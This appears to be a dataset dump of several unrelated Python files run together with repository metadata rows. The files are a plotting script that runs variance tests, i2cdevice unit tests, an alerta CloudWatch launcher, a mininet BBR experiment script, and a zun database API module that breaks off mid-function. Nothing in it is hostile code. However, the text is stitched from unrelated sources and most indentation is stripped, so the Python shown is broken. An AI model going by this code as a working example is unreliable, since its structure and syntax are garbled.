for y in range(0,len(plotData)):
if y<=x:
print >> stdout, "",
if x==y:
if minuslog10pvalue:
pvalueRow.append(0.0)
else:
pvalueRow.append(1.0)
else:
pvalueRow.append(pvalueM[y][x])
else:
#if max(len(plotData[x]),len(plotData[y]))<=20:
try:
pvalue=ansari(plotData[x],plotData[y])[1]
except:
pvalue="NA"
if minuslog10pvalue and str(pvalue)!="NA":
try:
pvalue=-1*log(pvalue,10)
except:
pvalue=-1000.0
#pvalue=1.0
print >> stdout,pvalue,
pvalueRow.append(pvalue)
#else:
# print >> stdout,wilcoxon(plotData[x],plotData[y])[1], # this is two-tailed already stdout, "", #
print >> stdout,"";
if plotPvalueCluster:
makePValueRawPlot(outputClusterPrefix+"_Ansari_raw",xtickLabels,pvalueM)
makePValueClusterPlot(outputClusterPrefix+"_Ansari",xtickLabels,pvalueM,methodCluster)
#####
#####now the variance tests
print >> stdout,""
print >> stdout,"Fligner's Two-sample Test for equal variance (non-parametrics)"
print >> stdout,"p-val",
for x in range(0,len(plotData)):
print >> stdout,xtickLabels[x],
pvalueM=[]
print >> stdout,""
for x in range(0,len(plotData)):
pvalueRow=[]
pvalueM.append(pvalueRow)
print >> stdout, xtickLabels[x],
for y in range(0,len(plotData)):
if y<=x:
print >> stdout, "",
if x==y:
if minuslog10pvalue:
pvalueRow.append(0.0)
else:
pvalueRow.append(1.0)
else:
pvalueRow.append(pvalueM[y][x])
else:
#if max(len(plotData[x]),len(plotData[y]))<=20:
try:
pvalue=fligner(plotData[x],plotData[y])[1]
except:
pvalue="NA"
#pvalue=1.0
if minuslog10pvalue and str(pvalue)!="NA":
try:
pvalue=-1*log(pvalue,10)
except:
pvalue=-1000.0
print >> stdout,pvalue,
pvalueRow.append(pvalue)
#else:
# print >> stdout,wilcoxon(plotData[x],plotData[y])[1], # this is two-tailed already stdout, "", #
print >> stdout,"";
if plotPvalueCluster:
makePValueRawPlot(outputClusterPrefix+"_fligner_raw",xtickLabels,pvalueM)
makePValueClusterPlot(outputClusterPrefix+"_fligner",xtickLabels,pvalueM,methodCluster)
#####
#####now the variance tests
print >> stdout,""
print >> stdout,"Levene's Two-sample Test for equal variance"
print >> stdout,"p-val",
for x in range(0,len(plotData)):
print >> stdout,xtickLabels[x],
pvalueM=[]
print >> stdout,""
for x in range(0,len(plotData)):
pvalueRow=[]
pvalueM.append(pvalueRow)
print >> stdout, xtickLabels[x],
for y in range(0,len(plotData)):
if y<=x:
print >> stdout, "",
if x==y:
if minuslog10pvalue:
pvalueRow.append(0.0)
else:
pvalueRow.append(1.0)
else:
pvalueRow.append(pvalueM[y][x])
else:
#if max(len(plotData[x]),len(plotData[y]))<=20:
try:
pvalue=levene(plotData[x],plotData[y])[1]
except:
pvalue="NA"
#pvalue=1.0
if minuslog10pvalue and str(pvalue)!="NA":
try:
pvalue=-1*log(pvalue,10)
except:
pvalue=-1000.0
print >> stdout,pvalue,
pvalueRow.append(pvalue)
#else:
# print >> stdout,wilcoxon(plotData[x],plotData[y])[1], # this is two-tailed already stdout, "", #
print >> stdout,"";
if plotPvalueCluster:
makePValueRawPlot(outputClusterPrefix+"_levene_raw",xtickLabels,pvalueM)
makePValueClusterPlot(outputClusterPrefix+"_levene",xtickLabels,pvalueM,methodCluster)
#####
#####now the variance tests
print >> stdout,""
print >> stdout,"Bartlett's Two-sample Test for equal variance (for normal distributions)"
print >> stdout,"p-val",
for x in range(0,len(plotData)):
print >> stdout,xtickLabels[x],
pvalueM=[]
print >> stdout,""
for x in range(0,len(plotData)):
pvalueRow=[]
pvalueM.append(pvalueRow)
print >> stdout, xtickLabels[x],
for y in range(0,len(plotData)):
if y<=x:
print >> stdout, "",
if x==y:
if minuslog10pvalue:
pvalueRow.append(0.0)
else:
pvalueRow.append(1.0)
else:
pvalueRow.append(pvalueM[y][x])
else:
#if max(len(plotData[x]),len(plotData[y]))<=20:
try:
pvalue=bartlett(plotData[x],plotData[y])[1]
except:
pvalue="NA"
#pvalue=1.0
if minuslog10pvalue and str(pvalue)!="NA":
try:
pvalue=-1*log(pvalue,10)
except:
pvalue=-1000.0
print >> stdout,pvalue,
pvalueRow.append(pvalue)
#else:
# print >> stdout,wilcoxon(plotData[x],plotData[y])[1], # this is two-tailed already stdout, "", #
print >> stdout,"";
if plotPvalueCluster:
makePValueRawPlot(outputClusterPrefix+"_bartlett_raw",xtickLabels,pvalueM)
makePValueClusterPlot(outputClusterPrefix+"_bartlett",xtickLabels,pvalueM,methodCluster)
#####
figure(figsize=figsz)
subplots_adjust(top=0.9, bottom=botta, left=0.2, right=0.8)
if len(titl)==0:
titl=outputFile
plotExpBox(plotData,xtickLabels,showIndPoints,mark,markMean,showMean,notch,whisker,outliers,xlegendrotation,xlabe,ylabe,titl,showSampleSizes,showViolin,showBox,annot,trendData,showLegend,makePzfxFile,makeBinMatrix,dividePlots)
#ylim([0,200])
for m in medianToDraw:
axhline(y=m,linestyle=':',color='gray')
savefig(outputFile,bbox_inches="tight")
if len(plotHistogramToFile)>0:
drawHistogram(plotHistogramToFile,plotData,xtickLabels)
drawDensigram(plotHistogramToFile+".density.png",plotData,xtickLabels)
def mulArray(x,n):
L=[]
for i in range(0,n):
L.append(x)
return L
def usageExit(programName):
print >> stderr,programName,"outputFile [ inputFile1 valCol1 inputFile2 valCol2 ...] "
print >> stderr,"Options:"
print >> stderr,"-t -F -d --fs seperator"
print >> stderr,"-r --headerRow headerRow"
print >> stderr,"-s --startRow startRow"
print >> stderr,"-p --showIndPoints"
print >> stderr,"-m --showMean"
print >> stderr,"-n --notch"
print >> stderr,"--first-col-annot first column of each valCol is annotation"
print >> stderr,"--plot-trend draw trend curves per file"
print >> stderr,"--xtick-rotation degree"
print >> stderr,"--offWhisker"
print >> stderr,"--offOutliers"
print >> stderr,"--hide-violin"
print >> stderr,"--minus-log10-pvalue output pvalue as -log10(pvalue)"
print >> stderr,"--pvalue-cluster-as prefix make pvalue cluster heatmap using 1-pvalue as distance metric"
print >> stderr,"--pvalue-cluster-method method cluster using one of the following method for the pvalue cluster heatmap"
print >> stderr,"--vfacecolor r,g,b,a --valpha a facecolor and alpha for violin plots"
print >> stderr,"--xlabel label"
print >> stderr,"--ylabel label"
print >> stderr,"--figsize w,h"
print >> stderr,"--title title (default is filename)"
print >> stderr,"--show-sample-sizes"
print >> stderr,"--relabel-as label1,label2,label3,... relabel the columns"
print >> stderr,"--plot-hist filename"
print >> stderr,"--plot-median-for-group cols"
print >> stderr,"--log base"
print >> stderr,"--show-legend"
print >> stderr,"--out-pzfx intemplate,outfile"
print >> stderr,"--out-bin-matrix outfile,numbins"
print >> stderr,"--write-data-summary-stat outfile write to outfile a table of mean and stddev etc"
print >> stderr,"--data-summary-stat-range min,max only consider data within the range min and max for doing summary stat table. Use NA to say no bound for each of the bounds"
print >> stderr,"--min-num-data-to-keep. set the minimal number of datapoints per col to keep. [2]"
print >> stderr,"--outXYZPvalues prefix. Write pvalues for statistics in the form of xyz format"
print >> stderr,"--ylims miny,maxy set min and max y to plot"
print >> stderr,"--whisker-style linestyle. set whisker line style, e.g., - for solid line"
print >> stderr,"--axhline y,linestyle,color draw horizontal line"
print >> stderr,"--skip-stat"
print >> stderr,"--divide-plots t1,t2,.. divide plots into subpopulations per column by thresholds t1,t2,...."
print >> stderr, "from PyCluster (see http://www.biopython.org/DIST/docs/api/Bio.Cluster.Record-class.html#treecluster)"
print >> stderr, "method : specifies which linkage method is used:"
print >> stderr, " method=='s': Single pairwise linkage"
print >> stderr, " method=='m': Complete (maximum) pairwise linkage (default)"
print >> stderr, " method=='c': Centroid linkage"
print >> stderr, " method=='a': Average pairwise linkage"
explainColumns(stderr)
sys.exit()
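# A minimal example invocation (a sketch only; the file names and column labels below are hypothetical):
#   plotViolinBox.py violins.png groupA.tsv Sample1,Sample2 groupB.tsv Sample3 \
#       --title "Expression" --log 2 --show-sample-sizes --xtick-rotation 45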
if __name__=='__main__':
programName=argv[0]
optlist,args=getopt(argv[1:],'t:F:d:r:s:pmn',['fs=','headerRow=','startRow=','showIndPoints','showMean','notch','offWhisker','offOutliers','pvalue-cluster-as=','pvalue-cluster-method=','xtick-rotation=','xlabel=','ylabel=','figsize=','title=','show-sample-sizes','trim-to-min-size','relabel-as=','plot-hist=','plot-median-for-group=','log=','bottom=','hide-violin','hide-box','plot-trend','first-col-annot','show-legend','out-pzfx=','pzfx-tableref-id=','out-bin-matrix=','write-data-summary-stat=','data-summary-stat-range=','minus-log10-pvalue','min-num-data-to-keep=','valpha=','vfacecolor=',"outXYZPvalues=",'ylims=','whisker-style=','axhline=','skip-stat','divide-plots='])
headerRow=1
startRow=2
fs="\t"
showIndPoints=False
showMean=False
whisker=True
outliers=True
notch=0
logb=0
plotHistogramToFile=""
plotMedianForGroups=[]
xlegendrotation=0
makePvalueClusters=False
pvalueClusterOutputPrefix=""
pvalueClusterMethod="a"
xlabe="Samples"
ylabe="Values"
titl=""
figsz=(8,6)
showSampleSizes=False
botta=0.3
filenames=[]
valcols=[]
headers=[]
relabels=[]
firstColAnnot=False
plotTrend=False
trimToMinSize=False
showViolin=True
showBox=True
showLegend=False
makePzfxFile=None
makeBinMatrix=None
pzfxTableRefID="Table0"
#if len(args)!=3:
writeDataSummaryStat=""
summaryStatRange=[None,None]
minuslog10pvalue=False
minNDataToKeep=2
vfacecolor='y'
valpha=1.0 #0.3
outXYZPvalues=None
ylims=None
axhlines=[]
whiskerStyle="--"
skipStat=False
dividePlots=[]
#else:
try:
outputFile=args[0]
for a,v in optlist:
if a in ["-F","-t","-d","--fs"]:
fs=replaceSpecialChar(v)
elif a in ["-s","--startRow"]:
startRow=int(v)
elif a in ["-r","--headerRow"]:
headerRow=int(v)
elif a in ["-p","--showIndPoints"]:
showIndPoints=True
elif a in ["-m","--showMean"]:
showMean=True
elif a in ["-n","--notch"]:
notch=1
elif a in ["--offOutliers"]:
outliers=False
elif a in ["--offWhisker"]:
whisker=False
elif a in ["--pvalue-cluster-as"]:
makePvalueClusters=True
pvalueClusterOutputPrefix=v
elif a in ["--pvalue-cluster-method"]:
pvalueClusterMethod=v
elif a in ["--xtick-rotation"]:
xlegendrotation=int(v)
elif a in ["--xlabel"]:
xlabe=v
elif a in ["--ylabel"]:
ylabe=v
elif a in ["--figsize"]:
v=v.split(",")
figsz=(int(v[0]),int(v[1]))
elif a in ["--title"]:
titl=v
elif a in ["--show-sample-sizes"]:
showSampleSizes=True
elif a in ["--trim-to-min-size"]:
trimToMinSize=True
elif a in ["--relabel-as"]:
print >> stderr,"v=",v
relabels=v.split(",")
elif a in ['--log']:
logb=log(float(v))
elif a in ['--plot-hist']:
plotHistogramToFile=v
elif a in ['--plot-median-for-group']:
plotMedianForGroups.append(v)
elif a in ['--bottom']:
botta=float(v)
elif a in ['--hide-violin']:
showViolin=False
elif a in ['--hide-box']:
showBox=False
elif a in ['--first-col-annot']:
firstColAnnot=True
elif a in ['--plot-trend']:
plotTrend=True
elif a in ['--show-legend']:
showLegend=True
elif a in ['--out-pzfx']:
makePzfxFile=v.split(",")
elif a in ['--out-bin-matrix']:
makeBinMatrix=v.split(",")
#print >> stderr,makeBinMatrix
makeBinMatrix[1]=int(makeBinMatrix[1])
elif a in ['--min-num-data-to-keep']:
minNDataToKeep=int(v)
elif a in ['--data-summary-stat-range']:
mi,ma=v.split(",")
summaryStatRange=[]
try:
mi=float(mi)
summaryStatRange.append(mi)
except:
summaryStatRange.append(None)
try:
ma=float(ma)
summaryStatRange.append(ma)
except:
summaryStatRange.append(None)
elif a in ['--write-data-summary-stat']:
writeDataSummaryStat=v
elif a in ['--minus-log10-pvalue']:
minuslog10pvalue=True
elif a in ['--valpha']:
				valpha=float(v)
elif a in ['--vfacecolor']:
vrgba=v.split(",")
if len(vrgba)<3:
vfacecolor=v
else:
vfacecolor=[]
for vr in vrgba:
vfacecolor.append(float(vr))
valpha=vfacecolor[3]
elif a in ['--outXYZPvalues']:
outXYZPvalues=v
elif a in ['--ylims']:
yl=v.split(",")
ylims=[float(yl[0]),float(yl[1])]
elif a in ['--whisker-style']:
whiskerStyle=v
elif a in ['--axhline']:
v=v.split(",")
axhlines.append(v) #[float(v[0]),v[1],v[2]])
elif a in ['--skip-stat']:
skipStat=True
elif a in ['--divide-plots']:
dividePlots=[float(x) for x in v.split(",")]
except:
traceback.print_stack()
usageExit(programName)
#print >> stderr,args
for i in range(1,len(args),2):
thisFilenames=glob(args[i])
valcolstring=args[i+1]
filenames.extend(thisFilenames)
for filenam in thisFilenames:
header,prestarts=getHeader(filenam,headerRow,startRow,fs)
cols=getCol0ListFromCol1ListStringAdv(header,valcolstring)
print >> stderr, thisFilenames, cols
valcols.append(cols)
headers.append(header)
if makePvalueClusters:
from Bio.Cluster.cluster import *
from Bio.Cluster import *
if showLegend:
figsz=(figsz[0]*2,figsz[1])
if makePzfxFile:
makePzfxFile+=[pzfxTableRefID]
plotExpBox_Main(filenames,headers,valcols,outputFile,fs,startRow,showIndPoints,'bo','g--',showMean,notch,whisker,outliers,makePvalueClusters,pvalueClusterOutputPrefix,pvalueClusterMethod,xlegendrotation,xlabe,ylabe,figsz,titl,showSampleSizes,trimToMinSize,relabels,logb,plotHistogramToFile,plotMedianForGroups,botta,showViolin,showBox,firstColAnnot,plotTrend,showLegend,makePzfxFile,makeBinMatrix,writeDataSummaryStat,summaryStatRange,minuslog10pvalue,minNDataToKeep,vfacecolor,valpha,outXYZPvalues,dividePlots)
|
[
"[email protected]"
] | |
a33ad1849151ab394185e17bf2023a657ad79628
|
0f1746146e1514bf20c25135cc624353d9c1a08e
|
/library/tests/test_utils.py
|
eac382d89c2518bb45a057b1b36500217a1f392b
|
[
"MIT"
] |
permissive
|
kklimek/i2cdevice-python
|
4bdb9ed46c109e78bc54cf512b98029705e34f10
|
54690cea60cbd91d8abffad38dcba3475236439b
|
refs/heads/master
| 2020-08-04T06:20:40.253068 | 2019-10-01T07:37:15 | 2019-10-02T13:59:32 | 212,036,695 | 0 | 0 |
MIT
| 2019-10-01T07:28:23 | 2019-10-01T07:28:23 | null |
UTF-8
|
Python
| false | false | 898 |
py
|
from i2cdevice import _mask_width, _leading_zeros, _trailing_zeros, _int_to_bytes
import pytest
def test_mask_width():
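    # _mask_width appears to measure the span from the lowest to the highest set bit of the
    # mask (any zero gaps included), which is why 0b101 also reports a width of 3.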
assert _mask_width(0b111) == 3
assert _mask_width(0b101) == 3
assert _mask_width(0b0111) == 3
assert _mask_width(0b1110) == 3
def test_leading_zeros():
assert _leading_zeros(0b1) == 7
assert _leading_zeros(0b10) == 6
assert _leading_zeros(0b100) == 5
    assert _leading_zeros(0b100000000) == 8  # 9th bit not counted by default
def test_trailing_zeros():
assert _trailing_zeros(0b1) == 0
assert _trailing_zeros(0b10) == 1
assert _trailing_zeros(0b100) == 2
assert _trailing_zeros(0b00000000) == 8 # Mask is all zeros
def test_int_to_bytes():
assert _int_to_bytes(512, 2) == b'\x02\x00'
assert _int_to_bytes(512, 2, endianness='little') == b'\x00\x02'
with pytest.raises(TypeError):
_int_to_bytes('', 2)
|
[
"[email protected]"
] | |
64121605ca20b778ed7290a0e87d052fbb42dfd3
|
0cff676ec482e23ee4d9867659f553aa3b7c7a3d
|
/bin/alert-cloudwatch
|
7873c24de514052ecc7a0799763db3b407e84069
|
[
"Apache-2.0"
] |
permissive
|
jaxxstorm/alerta
|
46db7e510ca3cc430e0235a526752615ad2bed18
|
af33dc951305134792f03b3ea0d8e49c32d69918
|
refs/heads/master
| 2020-12-25T03:20:19.934180 | 2014-06-21T20:58:44 | 2014-06-21T20:58:44 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 868 |
#!/usr/bin/env python
########################################
#
# alert-cloudwatch - Alert AWS CloudWatch
#
########################################
import os
import sys
possible_topdir = os.path.normpath(os.path.join(os.path.abspath(sys.argv[0]),
os.pardir,
os.pardir))
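# When run from a source checkout, put the checkout at the front of sys.path so the local
# 'alerta' package is imported in preference to any system-wide installation.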
if os.path.exists(os.path.join(possible_topdir, 'alerta', '__init__.py')):
sys.path.insert(0, possible_topdir)
from alerta.common import config
from alerta.common import log as logging
from alerta.cloudwatch.daemon import CloudWatchDaemon, __version__
LOG = logging.getLogger('alerta.cloudwatch')
CONF = config.CONF
if __name__ == '__main__':
config.parse_args(version=__version__)
logging.setup('alerta')
cloudwatch = CloudWatchDaemon('alert-cloudwatch')
cloudwatch.start()
|
[
"[email protected]"
] | ||
53435264f240904694179d2c3e32b6a930f22b9d
|
a88db875957d20f349d80cff48572ceb60881840
|
/bbr.py
|
dd6f495db12ecc8bd708c5fb2a0113a96f783803
|
[] |
no_license
|
mfkiwl/when-to-use-bbr
|
5f7d0f31768f93f2dc5448b8b9505860fcb1c4e2
|
a5eb4919d2193cbb750ee982df9f9c449afdf16c
|
refs/heads/master
| 2023-04-29T00:25:18.413169 | 2021-05-08T20:22:54 | 2021-05-08T20:22:54 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,084 |
py
|
import argparse
import mininet.topo
import mininet.net
import mininet.node
import mininet.link
import mininet.util
import mininet.clean
from remote import RemoteHost, RemoteSSHLink, RemoteOVSSwitch
class Topology(mininet.topo.Topo):
def __init__(self, config):
self.config = config
# in Section 3.1, the paper mentioned that the delay between h1/h2 and h3 is 40us
self._min_delay = "{0}us".format(40 / 2)
super(Topology, self).__init__()
def build(self):
h1 = self.addHost("h1")
h2 = self.addHost("h2")
h3 = self.addHost("h3", server=self.config.remote_host, user=self.config.remote_user,
port=self.config.remote_host_port)
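        # h3 carries the SSH connection details so it can live on a separate machine; run()
        # switches to RemoteHost/RemoteSSHLink when --remote-host is not "localhost".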
s1 = self.addSwitch("s1")
        # add links: h1 and h2 attach to s1 with the minimal delay; the s1--h3 link is the
        # bottleneck and carries half of the configured RTT in each direction
self.addLink(h1, s1, bw=self.config.bw, delay=self._min_delay)
self.addLink(h2, s1, bw=self.config.bw, delay=self._min_delay)
self.addLink(s1, h3, bw=self.config.bw, delay="{0}ms".format(self.config.rtt / 2))
def run(configs):
# clean up previous mininet runs in case of crashes
mininet.clean.cleanup()
topology = Topology(configs)
if configs.remote_host != "localhost":
net = mininet.net.Mininet(topology, host=RemoteHost, link=RemoteSSHLink, switch=RemoteOVSSwitch,
waitConnected=True)
else:
net = mininet.net.Mininet(topology, host=mininet.node.CPULimitedHost, link=mininet.link.TCLink)
net.start()
if configs.debug:
# test out the component
mininet.util.dumpNetConnections(net)
net.pingAll()
# clean up at the end
mininet.clean.cleanup()
def main():
parser = argparse.ArgumentParser("BBR experiments")
parser.add_argument("-c", "--congestion-control", choices=["bbr", "cubic"], default="bbr",
help="h1 and h2 congestion control algorithm type", type=str, dest="cc")
parser.add_argument("--rtt", choices=[5, 10, 25, 50, 75, 100, 150, 200], default=5,
help="RTT for the bottle net link", type=int, dest="rtt")
parser.add_argument("--bw", choices=[10, 20, 50, 100, 250, 500, 1000], default=10,
help="Bandwidth for the bottleneck link", type=int, dest="bw")
parser.add_argument("-s", "--size", "--buffer-size", choices=[0.1, 1, 10, 20, 50], default=0.1,
help="Switch buffer size", type=float, dest="size")
parser.add_argument("--remote-host", default="localhost", type=str, dest="remote_host",
help="remote host name/IP address")
parser.add_argument("--remote-host-port", default=22, type=int, dest="remote_host_port",
help="remote host port number to ssh in")
parser.add_argument("--remote-user", default="", type=str, dest="remote_user",
help="remote host user name")
parser.add_argument("--debug", action="store_true", dest="debug")
args = parser.parse_args()
# run the experiments
run(args)
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
3c9b2a28147271a35e418c0f478a1a5f33b742d5
|
490ffe1023a601760ae7288e86723f0c6e366bba
|
/kolla-docker/zun/zun/db/api_provideraccount.py
|
8c57c51969385a3f449a8780ca8f3cddad05ccc4
|
[
"Apache-2.0"
] |
permissive
|
bopopescu/Cloud-User-Management
|
89696a5ea5d2f95191327fbeab6c3e400bbfb2b8
|
390988bf4915a276c7bf8d96b62c3051c17d9e6e
|
refs/heads/master
| 2022-11-19T10:09:36.662906 | 2018-11-07T20:28:31 | 2018-11-07T20:28:31 | 281,786,345 | 0 | 0 | null | 2020-07-22T21:26:07 | 2020-07-22T21:26:06 | null |
UTF-8
|
Python
| false | false | 27,668 |
py
|
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Base API for Database
"""
from oslo_db import api as db_api
from zun.common import exception
from zun.common.i18n import _
from zun.common import profiler
import zun.conf
import logging
LOG = logging.getLogger(__name__)
"""Add the database backend mapping here"""
CONF = zun.conf.CONF
_BACKEND_MAPPING = {'sqlalchemy': 'zun.db.sqlalchemy.api'}
IMPL = db_api.DBAPI.from_config(CONF,
backend_mapping=_BACKEND_MAPPING,
lazy=True)
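# The concrete backend ('sqlalchemy' -> zun.db.sqlalchemy.api) is resolved lazily by oslo_db
# on first use; _get_dbdriver_instance() simply hands back this shared IMPL object.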
@profiler.trace("db")
def _get_dbdriver_instance():
"""Return a DB API instance."""
return IMPL
@profiler.trace("db")
def list_provideraccounts(context, filters=None, limit=None, marker=None,
sort_key=None, sort_dir=None):
"""List matching provideraccounts.
Return a list of the specified columns for all provideraccounts that match
the specified filters.
:param context: The security context
:param filters: Filters to apply. Defaults to None.
:param limit: Maximum number of provideraccounts to return.
:param marker: the last item of the previous page; we return the next
result set.
:param sort_key: Attribute by which results should be sorted.
:param sort_dir: Direction in which results should be sorted.
(asc, desc)
:returns: A list of tuples of the specified columns.
"""
return _get_dbdriver_instance().list_provideraccounts(
context, filters, limit, marker, sort_key, sort_dir)
@profiler.trace("db")
def create_provideraccount(context, values):
"""Create a new provideraccount.
:param context: The security context
:param values: A dict containing several items used to identify
and track the provideraccount, and several dicts which are
passed
into the Drivers when managing this provideraccount. For
example:
::
{
'uuid': uuidutils.generate_uuid(),
'name': 'example',
'type': 'virt'
}
:returns: A provideraccount.
"""
return _get_dbdriver_instance().create_provideraccount(context, values)
@profiler.trace("db")
def get_provideraccount_by_uuid(context, provideraccount_uuid):
"""Return a provideraccount.
:param context: The security context
:param provideraccount_uuid: The uuid of a provideraccount.
:returns: A provideraccount.
"""
return _get_dbdriver_instance().get_provideraccount_by_uuid(
context, provideraccount_uuid)
@profiler.trace("db")
def get_provideraccount_by_name(context, provideraccount_name):
"""Return a provideraccount.
:param context: The security context
:param provideraccount_name: The name of a provideraccount.
:returns: A provideraccount.
"""
return _get_dbdriver_instance().get_provideraccount_by_name(
context, provideraccount_name)
@profiler.trace("db")
def destroy_provideraccount(context, provideraccount_id):
"""Destroy a provideraccount and all associated interfaces.
:param context: Request context
:param provideraccount_id: The id or uuid of a provideraccount.
"""
    return _get_dbdriver_instance().destroy_provideraccount(
        context, provideraccount_id)
@profiler.trace("db")
def update_provideraccount(context, provideraccount_id, values):
"""Update properties of a provideraccount.
:context: Request context
:param provideraccount_id: The id or uuid of a provideraccount.
:values: The properties to be updated
:returns: A provideraccount.
:raises: ContainerNotFound
"""
return _get_dbdriver_instance().update_provideraccount(
context, provideraccount_id, values)
@profiler.trace("db")
def list_containers(context, filters=None, limit=None, marker=None,
sort_key=None, sort_dir=None):
"""List matching containers.
Return a list of the specified columns for all containers that match
the specified filters.
:param context: The security context
:param filters: Filters to apply. Defaults to None.
:param limit: Maximum number of containers to return.
:param marker: the last item of the previous page; we return the next
result set.
:param sort_key: Attribute by which results should be sorted.
:param sort_dir: Direction in which results should be sorted.
(asc, desc)
:returns: A list of tuples of the specified columns.
"""
return _get_dbdriver_instance().list_containers(
context, filters, limit, marker, sort_key, sort_dir)
@profiler.trace("db")
def create_container(context, values):
"""Create a new container.
:param context: The security context
:param values: A dict containing several items used to identify
and track the container, and several dicts which are
passed
into the Drivers when managing this container. For
example:
::
{
'uuid': uuidutils.generate_uuid(),
'name': 'example',
'type': 'virt'
}
:returns: A container.
"""
return _get_dbdriver_instance().create_container(context, values)
@profiler.trace("db")
def get_container_by_uuid(context, container_uuid):
"""Return a container.
:param context: The security context
:param container_uuid: The uuid of a container.
:returns: A container.
"""
return _get_dbdriver_instance().get_container_by_uuid(
context, container_uuid)
@profiler.trace("db")
def get_container_by_name(context, container_name):
"""Return a container.
:param context: The security context
:param container_name: The name of a container.
:returns: A container.
"""
return _get_dbdriver_instance().get_container_by_name(
context, container_name)
@profiler.trace("db")
def destroy_container(context, container_id):
"""Destroy a container and all associated interfaces.
:param context: Request context
:param container_id: The id or uuid of a container.
"""
return _get_dbdriver_instance().destroy_container(context, container_id)
@profiler.trace("db")
def update_container(context, container_id, values):
"""Update properties of a container.
:context: Request context
:param container_id: The id or uuid of a container.
:values: The properties to be updated
:returns: A container.
:raises: ContainerNotFound
"""
return _get_dbdriver_instance().update_container(
context, container_id, values)
@profiler.trace("db")
def destroy_zun_service(host, binary):
"""Destroys a zun_service record.
:param host: The host on which the service resides.
:param binary: The binary file name of the service.
:returns: A zun service record.
"""
return _get_dbdriver_instance().destroy_zun_service(host, binary)
@profiler.trace("db")
def update_zun_service(host, binary, values):
"""Update properties of a zun_service.
:param host: The host on which the service resides.
:param binary: The binary file name of the service.
:param values: The attributes to be updated.
:returns: A zun service record.
"""
return _get_dbdriver_instance().update_zun_service(host, binary, values)
@profiler.trace("db")
def get_zun_service(context, host, binary):
"""Return a zun_service record.
:param context: The security context
:param host: The host where the binary is located.
:param binary: The name of the binary.
:returns: A zun_service record.
"""
return _get_dbdriver_instance().get_zun_service(host, binary)
@profiler.trace("db")
def create_zun_service(values):
"""Create a new zun_service record.
:param values: A dict containing several items used to identify
and define the zun_service record.
:returns: A zun_service record.
"""
return _get_dbdriver_instance().create_zun_service(values)
@profiler.trace("db")
def list_zun_services(context, filters=None, limit=None,
marker=None, sort_key=None, sort_dir=None):
"""Get matching zun_service records.
Return a list of the specified columns for all zun_services
    that match the specified filters.
    :param context: The security context
    :param filters: Filters to apply. Defaults to None.
:param limit: Maximum number of zun_services to return.
:param marker: the last item of the previous page; we return the next
result set.
:param sort_key: Attribute by which results should be sorted.
:param sort_dir: Direction in which results should be sorted.
(asc, desc)
:returns: A list of tuples of the specified columns.
"""
return _get_dbdriver_instance().list_zun_services(
filters, limit, marker, sort_key, sort_dir)
@profiler.trace("db")
def list_zun_services_by_binary(context, binary):
"""List matching zun services.
Return a list of the specified binary.
:param context: The security context
:param binary: The name of the binary.
:returns: A list of tuples of the specified binary.
"""
return _get_dbdriver_instance().list_zun_services_by_binary(binary)
@profiler.trace("db")
def pull_image(context, values):
"""Create a new image.
:param context: The security context
:param values: A dict containing several items used to identify
and track the image, and several dicts which are
passed
into the Drivers when managing this image. For
example:
::
{
'uuid': uuidutils.generate_uuid(),
'repo': 'hello-world',
'tag': 'latest'
}
:returns: An image.
"""
return _get_dbdriver_instance().pull_image(context, values)
@profiler.trace("db")
def update_image(image_id, values):
"""Update properties of an image.
    :param image_id: The id or uuid of an image.
    :param values: The properties to be updated.
:returns: An Image.
:raises: ImageNotFound
"""
return _get_dbdriver_instance().update_image(image_id, values)
@profiler.trace("db")
def list_images(context, filters=None,
limit=None, marker=None,
sort_key=None, sort_dir=None):
"""Get matching images.
Return a list of the specified columns for all images that
match the specified filters.
:param context: The security context
:param filters: Filters to apply. Defaults to None.
:param limit: Maximum number of images to return.
:param marker: the last item of the previous page; we
return the next
:param sort_key: Attribute by which results should be sorted.
:param sort_dir: Direction in which results should be sorted.
(asc, desc)
:returns: A list of tuples of the specified columns.
"""
return _get_dbdriver_instance().list_images(
context, filters, limit, marker, sort_key, sort_dir)
@profiler.trace("db")
def get_image_by_id(context, image_id):
"""Return an image.
:param context: The security context
:param image_id: The id of an image.
:returns: An image.
"""
return _get_dbdriver_instance().get_image_by_id(context, image_id)
@profiler.trace("db")
def get_image_by_uuid(context, image_uuid):
"""Return an image.
:param context: The security context
:param image_uuid: The uuid of an image.
:returns: An image.
"""
return _get_dbdriver_instance().get_image_by_uuid(context, image_uuid)
@profiler.trace("db")
def list_resource_provideraccounts(context, filters=None, limit=None, marker=None,
sort_key=None, sort_dir=None):
"""Get matching resource provideraccounts.
Return a list of the specified columns for all resource provideraccounts that
match the specified filters.
:param context: The security context
:param filters: Filters to apply. Defaults to None.
:param limit: Maximum number of resource provideraccounts to return.
:param marker: the last item of the previous page; we
return the next
    :param sort_key: Attribute by which results should be sorted.
    :param sort_dir: Direction in which results should be sorted.
                     (asc, desc)
:returns: A list of tuples of the specified columns.
"""
return _get_dbdriver_instance().list_resource_provideraccounts(
context, filters, limit, marker, sort_key, sort_dir)
@profiler.trace("db")
def create_resource_provideraccount(context, values):
"""Create a new resource provideraccount.
:param context: The security context
:param values: A dict containing several items used to identify and
track the resource provideraccount, and several dicts which are
passed into the Drivers when managing this resource
provideraccount.
:returns: A resource provideraccount.
"""
return _get_dbdriver_instance().create_resource_provideraccount(context, values)
@profiler.trace("db")
def get_resource_provideraccount(context, provideraccount_ident):
"""Return a resource provideraccount.
:param context: The security context
:param provideraccount_ident: The uuid or name of a resource provideraccount.
:returns: A resource provideraccount.
"""
return _get_dbdriver_instance().get_resource_provideraccount(
context, provideraccount_ident)
@profiler.trace("db")
def destroy_resource_provideraccount(context, provideraccount_id):
"""Destroy a resource provideraccount and all associated interfaces.
:param context: Request context
:param provideraccount_id: The id or uuid of a resource provideraccount.
"""
return _get_dbdriver_instance().destroy_resource_provideraccount(
context, provideraccount_id)
@profiler.trace("db")
def update_resource_provideraccount(context, provideraccount_id, values):
